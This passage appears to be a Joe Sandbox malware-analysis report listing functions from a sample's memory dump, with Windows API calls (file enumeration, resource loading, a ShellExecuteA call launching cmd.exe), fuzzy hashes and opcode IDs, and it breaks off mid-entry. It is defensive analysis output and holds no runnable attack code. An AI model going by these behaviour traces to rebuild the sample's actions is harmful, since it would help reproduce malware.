                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: IconLoad
                                • String ID:
                                • API String ID: 2457776203-0
                                • Opcode ID: 987dc8aa1c4b3a391572c1f90d36992d096fb491d6f713308c818d54bd36514a
                                • Instruction ID: 274c6e8b6375608b12aaefe698a568ec2b24333b2e26eb9f58feebfc558e2af9
                                • Opcode Fuzzy Hash: 987dc8aa1c4b3a391572c1f90d36992d096fb491d6f713308c818d54bd36514a
                                • Instruction Fuzzy Hash: 73318F746047419ED310DF6AC445B8BFBE4FF59704F40481EE4AA87281CBB86508CFA6
                                Function 00457D60 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00457D65
                                  • Part of subcall function 00460C65: __EH_prolog.LIBCMT ref: 00460C6A
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 6a05e92a76c8c5ca9a0a769a5f5d4cc643f426d809164ab351f81e2bf9eae797
                                • Instruction ID: 97e62bb5cb5176d189c6cd675d589d9c7a8179aa92c1a68fb220006335a56f75
                                • Opcode Fuzzy Hash: 6a05e92a76c8c5ca9a0a769a5f5d4cc643f426d809164ab351f81e2bf9eae797
                                • Instruction Fuzzy Hash: 15212472900219ABCF06DF58D4819EE7BB9FF48354F10406AED01AB241D778AE48CBA4
                                Function 00458B1F Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00458BBD
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 35e1d86da7a2f004a6cc6ac27d4f5fb8925abfabb8f493127d4efe08fda53b48
                                • Instruction ID: cf859b758ff2acc04b1ecd057fffe6232e3ddb52d8bbd9ecb225a9b44f51b97d
                                • Opcode Fuzzy Hash: 35e1d86da7a2f004a6cc6ac27d4f5fb8925abfabb8f493127d4efe08fda53b48
                                • Instruction Fuzzy Hash: E731BB75A00219AFCF01DFA8C845ADEBBF5FF0C314B00446AF918E7210EB35AA519FA5
                                Function 004559FB Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Parent
                                • String ID:
                                • API String ID: 975332729-0
                                • Opcode ID: 5d60539e9fe0d6b5907cec7b90cc82e219825c6b1399d7bebee3bb11f346e87e
                                • Instruction ID: fd93277a5edab1037254a445adec77899b11dd427d2650e9889f3dc849f96d9e
                                • Opcode Fuzzy Hash: 5d60539e9fe0d6b5907cec7b90cc82e219825c6b1399d7bebee3bb11f346e87e
                                • Instruction Fuzzy Hash: 450161752106066B9F205E72DC94E7B7BAEEFC5366B004726FC11C3293E639DC149674
                                Function 00460C65 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00460C6A
                                  • Part of subcall function 004609B0: TlsAlloc.KERNEL32(?,00460C94,76F90A60,00000000,?,00460206,0045EC43,00460222,0045B32A,0045C845,76F90A60,00000000,?,00448293,00000000), ref: 004609D2
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: AllocH_prolog
                                • String ID:
                                • API String ID: 3910492588-0
                                • Opcode ID: 285b6ccc489d41c5de9a0535a65a64457fa7c9c7f49d3a8658ee213dc17cba7c
                                • Instruction ID: a0d859e667a0056672296448471ca11741ce94952222560437a9cc5b95dec7d2
                                • Opcode Fuzzy Hash: 285b6ccc489d41c5de9a0535a65a64457fa7c9c7f49d3a8658ee213dc17cba7c
                                • Instruction Fuzzy Hash: 59014B75601211DBDB2ABF65E81176A77B2EBD0365F20853FE49193390EB789C00CB69
                                Function 00457E4D Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4c95f913305d500bfc32bbbbee7193a633c0b3a4e4670fac29b056f2bae1782f
                                • Instruction ID: bb3e69d15d780de53330c5d6d72164c4e0a011380651103a9525379e83ea7078
                                • Opcode Fuzzy Hash: 4c95f913305d500bfc32bbbbee7193a633c0b3a4e4670fac29b056f2bae1782f
                                • Instruction Fuzzy Hash: 97F0123240431DBB8F125E91BC01DEF3B69AF09362F0084B6FD1555112C739DE25DBAA
                                Function 004011E0 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                Download Yara Rule
                                APIs
                                • FindResourceA.KERNEL32(?,?,00000006), ref: 004011F7
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: FindResource
                                • String ID:
                                • API String ID: 1635176832-0
                                • Opcode ID: a58b1a04dc1bea75977a2527b1b1ca33b918ea6efbe7517a5065409332ed68fe
                                • Instruction ID: 6dc988b005b8fc30f393fd8110b3f372d9b25c0a2933f789efa7e0433c938865
                                • Opcode Fuzzy Hash: a58b1a04dc1bea75977a2527b1b1ca33b918ea6efbe7517a5065409332ed68fe
                                • Instruction Fuzzy Hash: 2ED0C2262000203AD111261A7C009BB739CCBC5B75F01803FF981E6250D2749C4391B1
                                Function 00405690 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000013,00000013,00000000), ref: 004056B0
                                  • Part of subcall function 00405260: FindFirstFileA.KERNEL32(?,?,\*.*,00000004,?,?), ref: 0040530E
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: FileFindFirstFolderPathSpecial
                                • String ID:
                                • API String ID: 4139272456-0
                                • Opcode ID: e16a5da9c176f5747fdebabd61ae748e4b25d777e391b108598e2ecd6b42360c
                                • Instruction ID: b5141f72a04271b27f2cd416eb66c2580eae33dfd44c725751d1776040a00473
                                • Opcode Fuzzy Hash: e16a5da9c176f5747fdebabd61ae748e4b25d777e391b108598e2ecd6b42360c
                                • Instruction Fuzzy Hash: B7E092312083006AE324A710DC12FEB7B94EB44B10F40442DF5849A1C0DAB985448B8A
                                Function 0045FE1A Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                • InterlockedExchange.KERNEL32(004D986C,?), ref: 0045FE46
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ExchangeInterlocked
                                • String ID:
                                • API String ID: 367298776-0
                                • Opcode ID: 2bc2abf03f5655f9ba68e80518b30cb0f363e765179325703fd4d0107c92acbe
                                • Instruction ID: bc49aa0d4d948be67f9690471510b8ed3888739c125ddbc330b2db5705a8ca27
                                • Opcode Fuzzy Hash: 2bc2abf03f5655f9ba68e80518b30cb0f363e765179325703fd4d0107c92acbe
                                • Instruction Fuzzy Hash: 07E0DF35100A008FD321AF6D940899AB7E0EF89320312046FF451C7331CB3488018B06
                                Function 00454A37 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageA.USER32(?,00001307,?,?), ref: 00454A64
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: fd5ad6ed7d118575d801198fe39bceee9a7f057f70ad30e4d98d39196487485f
                                • Instruction ID: c409d0f2698309086833104a9a61d1fa4173a06d7f66be008a515749cb0ecf84
                                • Opcode Fuzzy Hash: fd5ad6ed7d118575d801198fe39bceee9a7f057f70ad30e4d98d39196487485f
                                • Instruction Fuzzy Hash: 82E07EB590020EAFCB41DFA8D94199E7BF8FB08304F108166F955E7351E770EA629FA1
                                Function 00456F8E Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                Download Yara Rule
                                APIs
                                • MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Message
                                • String ID:
                                • API String ID: 2030045667-0
                                • Opcode ID: 59faccf43a043a13470f99c3d54ef39fe2c79f88222e295741fce528b2289a15
                                • Instruction ID: 5178b5a0b41d74c9b106dcd966956f425ffcdcf2aff4cd00589aa289ec05536c
                                • Opcode Fuzzy Hash: 59faccf43a043a13470f99c3d54ef39fe2c79f88222e295741fce528b2289a15
                                • Instruction Fuzzy Hash: B6E08C32614251AF8B28CF24A800D7B73A4BB84301B4A481FB84283121D725CC048756
                                Function 004597FA Relevance: 1.5, APIs: 1, Instructions: 17windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsDialogMessageA.USER32(?,?), ref: 00459823
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: DialogMessage
                                • String ID:
                                • API String ID: 547518314-0
                                • Opcode ID: 1ffd83f6f69bfcf00c757c45a5924acd9a7cd19483080faaa8b4761980219d67
                                • Instruction ID: 950d9a05d3075b4753071b1ad27fd3419ca856100382ac3c2366567b47a6deba
                                • Opcode Fuzzy Hash: 1ffd83f6f69bfcf00c757c45a5924acd9a7cd19483080faaa8b4761980219d67
                                • Instruction Fuzzy Hash: 62E08C35104241DBCB156B58C808ACABBE6AF4A311B0189AAF48683632C7B59C94DB95
                                Function 004305A0 Relevance: 1.5, APIs: 1, Instructions: 15registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCloseKey.KERNEL32(00000000,?,00402F00), ref: 004305AC
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 74364db6edf65ac1cded7dca93091c5e8858f5bf4cced24a346546391798bd62
                                • Instruction ID: c7aa091f4a726c5968189d3feb802f8af7120f8bec3dfa8e5ccd4f51a11cb400
                                • Opcode Fuzzy Hash: 74364db6edf65ac1cded7dca93091c5e8858f5bf4cced24a346546391798bd62
                                • Instruction Fuzzy Hash: A7C012311281214ADB709E7CB80478132D8AB58711F11056AF481C3240E264C8824694
                                Function 0045988B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • SetWindowTextA.USER32(?,?), ref: 00459898
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: TextWindow
                                • String ID:
                                • API String ID: 530164218-0
                                • Opcode ID: 413112a5c85e39164c15968a7be78b297692ec4c01c10a6d7691b3f161ac27a9
                                • Instruction ID: ce08906d4c308bcf959607817f9718b1f7e877e17a9a83edb3ef6e712208b152
                                • Opcode Fuzzy Hash: 413112a5c85e39164c15968a7be78b297692ec4c01c10a6d7691b3f161ac27a9
                                • Instruction Fuzzy Hash: C9D0CA70210100DFCB80EF01DA88B11B7B1BF5034AF6088FAE6484A262DB339C57DF05
                                Function 00459941 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: c0e18a481122150143b8f281ff93b5c012e2675f0dd0cd29fdf8a5e77acdfeda
                                • Instruction ID: 422d110c87409b42cc3d40fc4940c954b3565e0feb40eec272749ef0314fdf92
                                • Opcode Fuzzy Hash: c0e18a481122150143b8f281ff93b5c012e2675f0dd0cd29fdf8a5e77acdfeda
                                • Instruction Fuzzy Hash: 72D0CA74200200EFCB80DF00D848B22BBB1AF5030AF2088EEE6454A262DB338C97DF06
                                Function 00459905 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(?,?,00455C74,00000000,0000E146,00000000,?,?,00402EB7), ref: 00459912
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: a9d97b9b013e5985470218459d1a2f55a5a072b57367bd69c52fcefe32dd499f
                                • Instruction ID: e981d7f3aa070d6dd922208303280657e88cd7f5e4e9c7b1544f0cb6238b2e4d
                                • Opcode Fuzzy Hash: a9d97b9b013e5985470218459d1a2f55a5a072b57367bd69c52fcefe32dd499f
                                • Instruction Fuzzy Hash: 03D0CA70200200EFCB40DF10E808B25B7B2BB9430AF2088EEE6000A26AD7338C17EF06

                                Non-executed Functions

                                Function 0042C040 Relevance: 58.1, APIs: 2, Strings: 31, Instructions: 357COMMON
                                Download Yara Rule
                                APIs
                                • _rand.LIBCMT ref: 0042C100
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 0042C35C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
